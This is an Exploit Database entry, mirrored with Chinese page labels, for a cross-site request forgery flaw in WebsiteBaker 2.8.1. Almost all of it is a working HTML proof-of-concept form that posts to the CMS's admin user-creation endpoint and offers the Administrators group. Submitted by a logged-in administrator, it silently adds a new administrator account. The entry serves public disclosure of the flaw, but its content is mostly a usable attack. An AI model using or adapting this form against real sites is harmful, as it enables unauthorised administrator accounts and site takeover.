WebsiteBaker 2.8.1 – Cross-Site Request Forgery

• Exploit Database
• 11 阅读

• 作者： Luis Santana
  日期： 2010-06-19
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/13938/

• # Author: Luis Santana
  # Software Link: http://www.websitebaker2.org/modules/download_gallery/dlc.php?file=88&id=1269641667
  # Version: 2.8.1
  # Tested on: All
  # Code : http://hacktalk.net/exploits/websitebakercsrfPOC.zip
  
  The full advisory can be found at
  http://hacktalk.net/exploits/websitebakerCSRF.txt
  
  Regards,
  Luis Santana
  Admin - http://hacktalk.net
  HackTalk Security
  
  <h1>WebsiteBaker 2.8.1 CSRF Proof of Concept By Luis Santana HackTalk Security</h1>
  <form name="user"action="http://demo.opensourcecms.com/websitebaker/admin/users/add.php" method="post" class="">
  <input type="hidden" name="user_id" value="" />
  <input type="hidden" name="username_fieldname" value="username_08y7h65u" />
  
  <table cellpadding="5" cellspacing="0" border="0" width="100%">
  <tr>
  <td width="150">Username:</td>
  <td class="value_input">
  <input type="text" name="username_08y7h65u" maxlength="30" value="" />
  </td>
  </tr>
  <tr>
  <td>Password:</td>
  
  <td class="value_input">
  <input type="password" name="password" maxlength="30" />
  </td>
  </tr>
  <tr>
  <td>Re-type Password:</td>
  <td class="value_input">
  <input type="password" name="password2" maxlength="30" />
  </td>
  
  </tr>
  <tr style="display:none;">
  <td> </td>
  <td style="font-size: 10px;">
  Please note: You should only enter values in the above fields if you wish to change this users password
  </td>
  </tr>
  <tr>
  <td>Display Name:</td>
  <td class="value_input">
  <input type="text" name="display_name" maxlength="255" value="" />
  
  </td>
  </tr>
  <tr>
  <td>Email:</td>
  <td class="value_input">
  <input type="text" name="email" maxlength="255" value="" />
  </td>
  </tr>
  <tr style="">
  <td>Home Folder:</td>
  
  <td class="value_input">
  <select name="home_folder">
  <option value="">None</option>
  
  <option value="/testbild" >/media/testbild</option>
  </select>
  </td>
  </tr>
  <tr>
  
  <td>Group:</td>
  <td class="value_input">
  <select name="groups[]" multiple="multiple" size="5">
  
  <option value="1" >Administrators</option>
  </select>
  </td>
  </tr>
  <tr>
  
  <td> </td>
  <td>
  <input type="radio" name="active[]" id="active" value="1" checked="checked" />
  <label for="active">Active</label>
  <input type="radio" name="active[]" id="disabled" value="0" />
  <label for="disabled">Disabled</label>
  </td>
  </tr>
  
  <tr>
  <td> </td>
  <td>
  <input type="submit" name="submit" value="Add" />
  <input type="reset" name="reset" value="Reset" />
  </td>
  </tr>
  </table>
  
  </form>
  
  
  <p>Greetz to Shardy, Xires and Stacy, Rage, and n3xus</p>